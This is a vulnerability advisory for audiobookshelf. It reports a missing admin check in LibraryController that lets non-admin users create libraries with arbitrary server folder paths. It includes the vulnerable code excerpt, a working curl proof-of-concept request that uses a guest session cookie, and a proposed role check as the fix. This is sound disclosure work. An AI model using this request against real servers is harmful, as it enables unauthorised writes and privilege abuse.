Summary
Greetings Team, Kartik and I discovered a path traversal issue (more precisely, a non-admin user abusing an admin-only feature), which places the vulnerability between path traversal and RBAC issues.
Details
A non-admin user is not allowed to create libraries (and may only access the ones they have permission to). However, the LibraryController (audiobookshelf/server/controllers/LibraryController.js, lines 43 to 47 at commit 1c0d6e9) is missing the check for an admin user and thus allows this vulnerability.
```js
async create(req, res) {
  // Excerpt: the body is accepted from any authenticated user; no isAdminOrUp check precedes this point
  const newLibraryPayload = {
    ...req.body
  }
  if (!newLibraryPayload.name || !newLibraryPayload.folders || !newLibraryPayload.folders.length) {
```
We believe that allowing non-admin users to write to any directory in the system can be seen as a form of path traversal. However, since it can be restricted to only admin permissions, fixing this is relatively simple and falls more into the realm of Role-Based Access Control (RBAC).
PoC
Create a user with no permissions:
A POC would be to send a request like so:
```sh
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: 10.0.0.162:3333' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0' -H $'Accept: application/json, text/plain, */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/json' -H $'Content-Length: 468' -H $'Origin: http://10.0.0.162:3333' -H $'Connection: keep-alive' -H $'Referer: http://10.0.0.162:3333/config/libraries' -H $'Priority: u=0' \
-b $'connect.sid=<GUEST_COOKIE>' \
--data-binary $'{\"name\":\"Nishant-hacked-1.txt\",\"provider\":\"google\",\"folders\":[{\"fullPath\":\"/tmp/nishant-kartik-poc.txt\"}],\"icon\":\"database\",\"mediaType\":\"text\",\"settings\":{\"coverAspectRatio\":1,\"disableWatcher\":false,\"skipMatchingMediaWithAsin\":false,\"skipMatchingMediaWithIsbn\":false,\"autoScanCronExpression\":null,\"hideSingleBookSeries\":false,\"onlyShowLaterBooksInContinueSeries\":false,\"metadataPrecedence\":[\"folderStructure\",\"audioMetatags\",\"nfoFile\",\"txtFiles\",\"opfFile\",\"absMetadata\"]}}' \
$'http://10.0.0.162:3333/api/libraries'
```
I am also attaching a video PoC for the same: https://www.loom.com/share/58f28fa857e44807857f19987ef1d696
Fix
Using an RBAC check similar to the one used in the other controllers should do the trick, like the one in BackupController (audiobookshelf/server/controllers/BackupController.js, lines 165 to 168 at commit e53ac65) for the upload functionality:
```js
if (!req.user.isAdminOrUp) {
  Logger.error(`[BackupController] Non-admin user "${req.user.username}" attempting to access backups`)
  return res.sendStatus(403)
}
```
We can have something similar in LibraryController. You can find the fix PR here: #pull1
Impact
Missing RBAC check allows non-admin users to write folders anywhere in the system.